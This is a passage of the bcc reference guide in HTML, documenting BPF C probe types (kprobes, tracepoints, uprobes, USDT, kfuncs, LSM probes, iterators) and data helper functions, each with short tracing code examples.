|
||
<li><a href="bcc-documents/reference_guide.html#licensing">Licensing</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#rewriter">Rewriter</a></li>
|
||
</ul>
|
||
</li>
|
||
<li>
|
||
<p><a href="bcc-documents/reference_guide.html#bcc-python">bcc Python</a></p>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#initialization">Initialization</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-bpf">1. BPF</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-usdt">2. USDT</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#events">Events</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-attach_kprobe">1. attach_kprobe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-attach_kretprobe">2. attach_kretprobe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-attach_tracepoint">3. attach_tracepoint()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-attach_uprobe">4. attach_uprobe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-attach_uretprobe">5. attach_uretprobe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-usdtenable_probe">6. USDT.enable_probe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-attach_raw_tracepoint">7. attach_raw_tracepoint()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-attach_raw_socket">8. attach_raw_socket()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-attach_xdp">9. attach_xdp()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#10-attach_func">10. attach_func()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#11-detach_func">11. detach_func()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#12-detach_kprobe">12. detach_kprobe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#13-detach_kretprobe">13. detach_kretprobe()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#debug-output">Debug Output</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-trace_print">1. trace_print()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-trace_fields">2. trace_fields()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#output-apis">Output APIs</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-perf_buffer_poll">1. perf_buffer_poll()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-ring_buffer_poll">2. ring_buffer_poll()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-ring_buffer_consume">3. ring_buffer_consume()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#map-apis">Map APIs</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-get_table">1. get_table()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-open_perf_buffer">2. open_perf_buffer()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-items">3. items()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-values">4. values()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-clear">5. clear()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-items_lookup_and_delete_batch">6. items_lookup_and_delete_batch()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-items_lookup_batch">7. items_lookup_batch()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-items_delete_batch">8. items_delete_batch()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-items_update_batch">9. items_update_batch()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#10-print_log2_hist">10. print_log2_hist()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#11-print_linear_hist">11. print_linear_hist()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#12-open_ring_buffer">12. open_ring_buffer()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#13-push">13. push()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#14-pop">14. pop()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#15-peek">15. peek()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#helpers">Helpers</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-ksym">1. ksym()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-ksymname">2. ksymname()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-sym">3. sym()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-num_open_kprobes">4. num_open_kprobes()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-get_syscall_fnname">5. get_syscall_fnname()</a></li>
|
||
</ul>
|
||
</li>
|
||
</ul>
|
||
</li>
|
||
<li>
|
||
<p><a href="bcc-documents/reference_guide.html#bpf-errors">BPF Errors</a></p>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-invalid-mem-access">1. Invalid mem access</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-cannot-call-gpl-only-function-from-proprietary-program">2. Cannot call GPL only function from proprietary program</a></li>
|
||
</ul>
|
||
</li>
|
||
<li>
|
||
<p><a href="bcc-documents/reference_guide.html#Environment-Variables">Environment Variables</a></p>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-kernel-source-directory">1. kernel source directory</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-kernel-version-overriding">2. kernel version overriding</a></li>
|
||
</ul>
|
||
</li>
|
||
</ul>
|
||
<h1 id="bpf-c"><a class="header" href="#bpf-c">BPF C</a></h1>
|
||
<p>This section describes the C part of a bcc program.</p>
|
||
<h2 id="events--arguments"><a class="header" href="#events--arguments">Events & Arguments</a></h2>
|
||
<h3 id="1-kprobes"><a class="header" href="#1-kprobes">1. kprobes</a></h3>
|
||
<p>Syntax: kprobe__<em>kernel_function_name</em></p>
|
||
<p><code>kprobe__</code> is a special prefix that creates a kprobe (dynamic tracing of a kernel function call) for the kernel function name provided as the remainder. You can also use kprobes by declaring a normal C function, then using the Python <code>BPF.attach_kprobe()</code> (covered later) to associate it with a kernel function.</p>
|
||
<p>Arguments are specified on the function declaration: kprobe__<em>kernel_function_name</em>(struct pt_regs *ctx [, <em>argument1</em> ...])</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-c">int kprobe__tcp_v4_connect(struct pt_regs *ctx, struct sock *sk) {
|
||
[...]
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the tcp_v4_connect() kernel function using a kprobe, with the following arguments:</p>
|
||
<ul>
|
||
<li><code>struct pt_regs *ctx</code>: Registers and BPF context.</li>
|
||
<li><code>struct sock *sk</code>: First argument to tcp_v4_connect().</li>
|
||
</ul>
|
||
<p>The first argument is always <code>struct pt_regs *</code>, the remainder are the arguments to the function (they don't need to be specified, if you don't intend to use them).</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/examples/tracing/tcpv4connect.py#L28">code</a> (<a href="https://github.com/iovisor/bcc/blob/5bd0eb21fd148927b078deb8ac29fff2fb044b66/examples/tracing/tcpv4connect_example.txt#L8">output</a>),
|
||
<a href="https://github.com/iovisor/bcc/commit/310ab53710cfd46095c1f6b3e44f1dbc8d1a41d8#diff-8cd1822359ffee26e7469f991ce0ef00R26">code</a> (<a href="https://github.com/iovisor/bcc/blob/3b9679a3bd9b922c736f6061dc65cb56de7e0250/examples/tracing/bitehist_example.txt#L6">output</a>)</p>
|
||
<!--- I can't add search links here, since github currently cannot handle partial-word searches needed for "kprobe__" --->
|
||
<h3 id="2-kretprobes"><a class="header" href="#2-kretprobes">2. kretprobes</a></h3>
|
||
<p>Syntax: kretprobe__<em>kernel_function_name</em></p>
|
||
<p><code>kretprobe__</code> is a special prefix that creates a kretprobe (dynamic tracing of a kernel function return) for the kernel function name provided as the remainder. You can also use kretprobes by declaring a normal C function, then using the Python <code>BPF.attach_kretprobe()</code> (covered later) to associate it with a kernel function.</p>
|
||
<p>Return value is available as <code>PT_REGS_RC(ctx)</code>, given a function declaration of: kretprobe__<em>kernel_function_name</em>(struct pt_regs *ctx)</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">int kretprobe__tcp_v4_connect(struct pt_regs *ctx)
|
||
{
|
||
int ret = PT_REGS_RC(ctx);
|
||
[...]
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the return of the tcp_v4_connect() kernel function using a kretprobe, and stores the return value in <code>ret</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/examples/tracing/tcpv4connect.py#L38">code</a> (<a href="https://github.com/iovisor/bcc/blob/5bd0eb21fd148927b078deb8ac29fff2fb044b66/examples/tracing/tcpv4connect_example.txt#L8">output</a>)</p>
|
||
<h3 id="3-tracepoints"><a class="header" href="#3-tracepoints">3. Tracepoints</a></h3>
|
||
<p>Syntax: TRACEPOINT_PROBE(<em>category</em>, <em>event</em>)</p>
|
||
<p>This is a macro that instruments the tracepoint defined by <em>category</em>:<em>event</em>.</p>
|
||
<p>The tracepoint name is <code><category>:<event></code>.
|
||
The probe function name is <code>tracepoint__<category>__<event></code>.</p>
|
||
<p>Arguments are available in an <code>args</code> struct, which are the tracepoint arguments. One way to list these is to cat the relevant format file under /sys/kernel/debug/tracing/events/<em>category</em>/<em>event</em>/format.</p>
|
||
<p>The <code>args</code> struct can be used in place of <code>ctx</code> in each functions requiring a context as an argument. This includes notably <a href="bcc-documents/reference_guide.html#3-perf_submit">perf_submit()</a>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">TRACEPOINT_PROBE(random, urandom_read) {
|
||
// args is from /sys/kernel/debug/tracing/events/random/urandom_read/format
|
||
bpf_trace_printk("%d\\n", args->got_bits);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the tracepoint <code>random:urandom_read tracepoint</code>, and prints the tracepoint argument <code>got_bits</code>.
|
||
When using Python API, this probe is automatically attached to the right tracepoint target.
|
||
For C++, this tracepoint probe can be attached by specifying the tracepoint target and function name explicitly:
|
||
<code>BPF::attach_tracepoint("random:urandom_read", "tracepoint__random__urandom_read")</code>
|
||
Note the name of the probe function defined above is <code>tracepoint__random__urandom_read</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/a4159da8c4ea8a05a3c6e402451f530d6e5a8b41/examples/tracing/urandomread.py#L19">code</a> (<a href="https://github.com/iovisor/bcc/commit/e422f5e50ecefb96579b6391a2ada7f6367b83c4#diff-41e5ecfae4a3b38de5f4e0887ed160e5R10">output</a>),
|
||
<a href="https://github.com/iovisor/bcc/search?q=TRACEPOINT_PROBE+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=TRACEPOINT_PROBE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="4-uprobes"><a class="header" href="#4-uprobes">4. uprobes</a></h3>
|
||
<p>These are instrumented by declaring a normal function in C, then associating it as a uprobe probe in Python via <code>BPF.attach_uprobe()</code> (covered later).</p>
|
||
<p>Arguments can be examined using <code>PT_REGS_PARM</code> macros.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">int count(struct pt_regs *ctx) {
|
||
char buf[64];
|
||
bpf_probe_read_user(&buf, sizeof(buf), (void *)PT_REGS_PARM1(ctx));
|
||
bpf_trace_printk("%s %d", buf, PT_REGS_PARM2(ctx));
|
||
return(0);
|
||
}
|
||
</code></pre>
|
||
<p>This reads the first argument as a string, and then prints it with the second argument as an integer.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/examples/tracing/strlen_count.py#L26">code</a></p>
|
||
<h3 id="5-uretprobes"><a class="header" href="#5-uretprobes">5. uretprobes</a></h3>
|
||
<p>These are instrumented by declaring a normal function in C, then associating it as a uretprobe probe in Python via <code>BPF.attach_uretprobe()</code> (covered later).</p>
|
||
<p>Return value is available as <code>PT_REGS_RC(ctx)</code>, given a function declaration of: <em>function_name</em>(struct pt_regs *ctx)</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_HISTOGRAM(dist);
|
||
int count(struct pt_regs *ctx) {
|
||
dist.increment(PT_REGS_RC(ctx));
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>This increments the bucket in the <code>dist</code> histogram that is indexed by the return value.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/examples/tracing/strlen_hist.py#L39">code</a> (<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/examples/tracing/strlen_hist.py#L15">output</a>),
|
||
<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/tools/bashreadline.py">code</a> (<a href="https://github.com/iovisor/bcc/commit/aa87997d21e5c1a6a20e2c96dd25eb92adc8e85d#diff-2fd162f9e594206f789246ce97d62cf0R7">output</a>)</p>
|
||
<h3 id="6-usdt-probes"><a class="header" href="#6-usdt-probes">6. USDT probes</a></h3>
|
||
<p>These are User Statically-Defined Tracing (USDT) probes, which may be placed in some applications or libraries to provide a user-level equivalent of tracepoints. The primary BPF method provided for USDT support method is <code>enable_probe()</code>. USDT probes are instrumented by declaring a normal function in C, then associating it as a USDT probe in Python via <code>USDT.enable_probe()</code>.</p>
|
||
<p>Arguments can be read via: bpf_usdt_readarg(<em>index</em>, ctx, &addr)</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">int do_trace(struct pt_regs *ctx) {
|
||
uint64_t addr;
|
||
char path[128];
|
||
bpf_usdt_readarg(6, ctx, &addr);
|
||
bpf_probe_read_user(&path, sizeof(path), (void *)addr);
|
||
bpf_trace_printk("path:%s\\n", path);
|
||
return 0;
|
||
};
|
||
</code></pre>
|
||
<p>This reads the sixth USDT argument, and then pulls it in as a string to <code>path</code>.</p>
|
||
<p>When initializing USDTs via the third argument of <code>BPF::init</code> in the C API, if any USDT fails to <code>init</code>, entire <code>BPF::init</code> will fail. If you're OK with some USDTs failing to <code>init</code>, use <code>BPF::init_usdt</code> before calling <code>BPF::init</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/commit/4f88a9401357d7b75e917abd994aa6ea97dda4d3#diff-04a7cad583be5646080970344c48c1f4R24">code</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_usdt_readarg+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_usdt_readarg+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="7-raw-tracepoints"><a class="header" href="#7-raw-tracepoints">7. Raw Tracepoints</a></h3>
|
||
<p>Syntax: RAW_TRACEPOINT_PROBE(<em>event</em>)</p>
|
||
<p>This is a macro that instruments the raw tracepoint defined by <em>event</em>.</p>
|
||
<p>The argument is a pointer to struct <code>bpf_raw_tracepoint_args</code>, which is defined in <a href="https://github.com/iovisor/bcc/blob/master/src/cc/compat/linux/virtual_bpf.h">bpf.h</a>. The struct field <code>args</code> contains all parameters of the raw tracepoint where you can found at linux tree <a href="https://github.com/torvalds/linux/tree/master/include/trace/events">include/trace/events</a>
|
||
directory.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">RAW_TRACEPOINT_PROBE(sched_switch)
|
||
{
|
||
// TP_PROTO(bool preempt, struct task_struct *prev, struct task_struct *next)
|
||
struct task_struct *prev = (struct task_struct *)ctx->args[1];
|
||
struct task_struct *next= (struct task_struct *)ctx->args[2];
|
||
s32 prev_tgid, next_tgid;
|
||
|
||
bpf_probe_read_kernel(&prev_tgid, sizeof(prev->tgid), &prev->tgid);
|
||
bpf_probe_read_kernel(&next_tgid, sizeof(next->tgid), &next->tgid);
|
||
bpf_trace_printk("%d -> %d\\n", prev_tgid, next_tgid);
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the sched:sched_switch tracepoint, and prints the prev and next tgid.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=RAW_TRACEPOINT_PROBE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="8-system-call-tracepoints"><a class="header" href="#8-system-call-tracepoints">8. system call tracepoints</a></h3>
|
||
<p>Syntax: <code>syscall__SYSCALLNAME</code></p>
|
||
<p><code>syscall__</code> is a special prefix that creates a kprobe for the system call name provided as the remainder. You can use it by declaring a normal C function, then using the Python <code>BPF.get_syscall_fnname(SYSCALLNAME)</code> and <code>BPF.attach_kprobe()</code> to associate it.</p>
|
||
<p>Arguments are specified on the function declaration: <code>syscall__SYSCALLNAME(struct pt_regs *ctx, [, argument1 ...])</code>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">int syscall__execve(struct pt_regs *ctx,
|
||
const char __user *filename,
|
||
const char __user *const __user *__argv,
|
||
const char __user *const __user *__envp)
|
||
{
|
||
[...]
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the execve system call.</p>
|
||
<p>The first argument is always <code>struct pt_regs *</code>, the remainder are the arguments to the function (they don't need to be specified, if you don't intend to use them).</p>
|
||
<p>Corresponding Python code:</p>
|
||
<pre><code class="language-Python">b = BPF(text=bpf_text)
|
||
execve_fnname = b.get_syscall_fnname("execve")
|
||
b.attach_kprobe(event=execve_fnname, fn_name="syscall__execve")
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/552658edda09298afdccc8a4b5e17311a2d8a771/tools/execsnoop.py#L101">code</a> (<a href="https://github.com/iovisor/bcc/blob/552658edda09298afdccc8a4b5e17311a2d8a771/tools/execsnoop_example.txt#L8">output</a>)</p>
|
||
<h3 id="9-kfuncs"><a class="header" href="#9-kfuncs">9. kfuncs</a></h3>
|
||
<p>Syntax: KFUNC_PROBE(<em>function</em>, typeof(arg1) arg1, typeof(arg2) arge ...)</p>
|
||
<p>This is a macro that instruments the kernel function via trampoline
|
||
<em>before</em> the function is executed. It's defined by <em>function</em> name and
|
||
the function arguments defined as <em>argX</em>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">KFUNC_PROBE(do_sys_open, int dfd, const char *filename, int flags, int mode)
|
||
{
|
||
...
|
||
</code></pre>
|
||
<p>This instruments the do_sys_open kernel function and make its arguments
|
||
accessible as standard argument values.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=KFUNC_PROBE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="10-kretfuncs"><a class="header" href="#10-kretfuncs">10. kretfuncs</a></h3>
|
||
<p>Syntax: KRETFUNC_PROBE(<em>event</em>, typeof(arg1) arg1, typeof(arg2) arge ..., int ret)</p>
|
||
<p>This is a macro that instruments the kernel function via trampoline
|
||
<em>after</em> the function is executed. It's defined by <em>function</em> name and
|
||
the function arguments defined as <em>argX</em>.</p>
|
||
<p>The last argument of the probe is the return value of the instrumented function.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">KRETFUNC_PROBE(do_sys_open, int dfd, const char *filename, int flags, int mode, int ret)
|
||
{
|
||
...
|
||
</code></pre>
|
||
<p>This instruments the do_sys_open kernel function and make its arguments
|
||
accessible as standard argument values together with its return value.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=KRETFUNC_PROBE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="11-lsm-probes"><a class="header" href="#11-lsm-probes">11. LSM Probes</a></h3>
|
||
<p>Syntax: LSM_PROBE(<em>hook</em>, typeof(arg1) arg1, typeof(arg2) arg2 ...)</p>
|
||
<p>This is a macro that instruments an LSM hook as a BPF program. It can be
|
||
used to audit security events and implement MAC security policies in BPF.
|
||
It is defined by specifying the hook name followed by its arguments.</p>
|
||
<p>Hook names can be found in
|
||
<a href="https://github.com/torvalds/linux/blob/v5.15/include/linux/security.h#L260">include/linux/security.h</a>
|
||
by taking functions like <code>security_hookname</code> and taking just the <code>hookname</code> part.
|
||
For example, <code>security_bpf</code> would simply become <code>bpf</code>.</p>
|
||
<p>Unlike other BPF program types, the return value specified in an LSM probe
|
||
matters. A return value of 0 allows the hook to succeed, whereas
|
||
any non-zero return value will cause the hook to fail and deny the
|
||
security operation.</p>
|
||
<p>The following example instruments a hook that denies all future BPF operations:</p>
|
||
<pre><code class="language-C">LSM_PROBE(bpf, int cmd, union bpf_attr *attr, unsigned int size)
|
||
{
|
||
return -EPERM;
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the <code>security_bpf</code> hook and causes it to return <code>-EPERM</code>.
|
||
Changing <code>return -EPERM</code> to <code>return 0</code> would cause the BPF program
|
||
to allow the operation instead.</p>
|
||
<p>LSM probes require at least a 5.7+ kernel with the following configuation options set:</p>
|
||
<ul>
|
||
<li><code>CONFIG_BPF_LSM=y</code></li>
|
||
<li><code>CONFIG_LSM</code> comma separated string must contain "bpf" (for example,
|
||
<code>CONFIG_LSM="lockdown,yama,bpf"</code>)</li>
|
||
</ul>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=LSM_PROBE+path%3Atests&type=Code">search /tests</a></p>
|
||
<h3 id="12-bpf-iterators"><a class="header" href="#12-bpf-iterators">12. BPF ITERATORS</a></h3>
|
||
<p>Syntax: BPF_ITER(target)</p>
|
||
<p>This is a macro to define a program signature for a bpf iterator program. The argument <em>target</em> specifies what to iterate for the program.</p>
|
||
<p>Currently, kernel does not have interface to discover what targets are supported. A good place to find what is supported is in <a href="https://github.com/torvalds/linux/blob/master/tools/testing/selftests/bpf/prog_tests/bpf_iter.c">tools/testing/selftests/bpf/prog_test/bpf_iter.c</a> and some sample bpf iter programs are in <a href="https://github.com/torvalds/linux/tree/master/tools/testing/selftests/bpf/progs">tools/testing/selftests/bpf/progs</a> with file name prefix <em>bpf_iter</em>.</p>
|
||
<p>The following example defines a program for target <em>task</em>, which traverses all tasks in the kernel.</p>
|
||
<pre><code class="language-C">BPF_ITER(task)
|
||
{
|
||
struct seq_file *seq = ctx->meta->seq;
|
||
struct task_struct *task = ctx->task;
|
||
|
||
if (task == (void *)0)
|
||
return 0;
|
||
|
||
... task->pid, task->tgid, task->comm, ...
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>BPF iterators are introduced in 5.8 kernel for task, task_file, bpf_map, netlink_sock and ipv6_route . In 5.9, support is added to tcp/udp sockets and bpf map element (hashmap, arraymap and sk_local_storage_map) traversal.</p>
|
||
<h2 id="data"><a class="header" href="#data">Data</a></h2>
|
||
<h3 id="1-bpf_probe_read_kernel"><a class="header" href="#1-bpf_probe_read_kernel">1. bpf_probe_read_kernel()</a></h3>
|
||
<p>Syntax: <code>int bpf_probe_read_kernel(void *dst, int size, const void *src)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>This copies size bytes from kernel address space to the BPF stack, so that BPF can later operate on it. For safety, all kernel memory reads must pass through bpf_probe_read_kernel(). This happens automatically in some cases, such as dereferencing kernel variables, as bcc will rewrite the BPF program to include the necessary bpf_probe_read_kernel().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_kernel+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_kernel+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="2-bpf_probe_read_kernel_str"><a class="header" href="#2-bpf_probe_read_kernel_str">2. bpf_probe_read_kernel_str()</a></h3>
|
||
<p>Syntax: <code>int bpf_probe_read_kernel_str(void *dst, int size, const void *src)</code></p>
|
||
<p>Return:</p>
|
||
<ul>
|
||
<li>> 0 length of the string including the trailing NULL on success</li>
|
||
<li>< 0 error</li>
|
||
</ul>
|
||
<p>This copies a <code>NULL</code> terminated string from kernel address space to the BPF stack, so that BPF can later operate on it. In case the string length is smaller than size, the target is not padded with further <code>NULL</code> bytes. In case the string length is larger than size, just <code>size - 1</code> bytes are copied and the last byte is set to <code>NULL</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_kernel_str+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_kernel_str+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="3-bpf_ktime_get_ns"><a class="header" href="#3-bpf_ktime_get_ns">3. bpf_ktime_get_ns()</a></h3>
|
||
<p>Syntax: <code>u64 bpf_ktime_get_ns(void)</code></p>
|
||
<p>Return: u64 number of nanoseconds. Starts at system boot time but stops during suspend.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_ktime_get_ns+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_ktime_get_ns+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="4-bpf_get_current_pid_tgid"><a class="header" href="#4-bpf_get_current_pid_tgid">4. bpf_get_current_pid_tgid()</a></h3>
|
||
<p>Syntax: <code>u64 bpf_get_current_pid_tgid(void)</code></p>
|
||
<p>Return: <code>current->tgid << 32 | current->pid</code></p>
|
||
<p>Returns the process ID in the lower 32 bits (kernel's view of the PID, which in user space is usually presented as the thread ID), and the thread group ID in the upper 32 bits (what user space often thinks of as the PID). By directly setting this to a u32, we discard the upper 32 bits.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_pid_tgid+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_pid_tgid+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="5-bpf_get_current_uid_gid"><a class="header" href="#5-bpf_get_current_uid_gid">5. bpf_get_current_uid_gid()</a></h3>
|
||
<p>Syntax: <code>u64 bpf_get_current_uid_gid(void)</code></p>
|
||
<p>Return: <code>current_gid << 32 | current_uid</code></p>
|
||
<p>Returns the user ID and group IDs.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_uid_gid+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_uid_gid+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="6-bpf_get_current_comm"><a class="header" href="#6-bpf_get_current_comm">6. bpf_get_current_comm()</a></h3>
|
||
<p>Syntax: <code>bpf_get_current_comm(char *buf, int size_of_buf)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>Populates the first argument address with the current process name. It should be a pointer to a char array of at least size TASK_COMM_LEN, which is defined in linux/sched.h. For example:</p>
|
||
<pre><code class="language-C">#include <linux/sched.h>
|
||
|
||
int do_trace(struct pt_regs *ctx) {
|
||
char comm[TASK_COMM_LEN];
|
||
bpf_get_current_comm(&comm, sizeof(comm));
|
||
[...]
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_comm+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_comm+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="7-bpf_get_current_task"><a class="header" href="#7-bpf_get_current_task">7. bpf_get_current_task()</a></h3>
|
||
<p>Syntax: <code>bpf_get_current_task()</code></p>
|
||
<p>Return: current task as a pointer to struct task_struct.</p>
|
||
<p>Returns a pointer to the current task's task_struct object. This helper can be used to compute the on-CPU time for a process, identify kernel threads, get the current CPU's run queue, or retrieve many other pieces of information.</p>
|
||
<p>With Linux 4.13, due to issues with field randomization, you may need two #define directives before the includes:</p>
|
||
<pre><code class="language-C">#define randomized_struct_fields_start struct {
|
||
#define randomized_struct_fields_end };
|
||
#include <linux/sched.h>
|
||
|
||
int do_trace(void *ctx) {
|
||
struct task_struct *t = (struct task_struct *)bpf_get_current_task();
|
||
[...]
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_task+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_current_task+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="8-bpf_log2l"><a class="header" href="#8-bpf_log2l">8. bpf_log2l()</a></h3>
|
||
<p>Syntax: <code>unsigned int bpf_log2l(unsigned long v)</code></p>
|
||
<p>Returns the log-2 of the provided value. This is often used to create indexes for histograms, to construct power-of-2 histograms.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_log2l+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_log2l+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="9-bpf_get_prandom_u32"><a class="header" href="#9-bpf_get_prandom_u32">9. bpf_get_prandom_u32()</a></h3>
|
||
<p>Syntax: <code>u32 bpf_get_prandom_u32()</code></p>
|
||
<p>Returns a pseudo-random u32.</p>
|
||
<p>Example in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_prandom_u32+path%3Aexamples&type=Code">search /examples</a>,
|
||
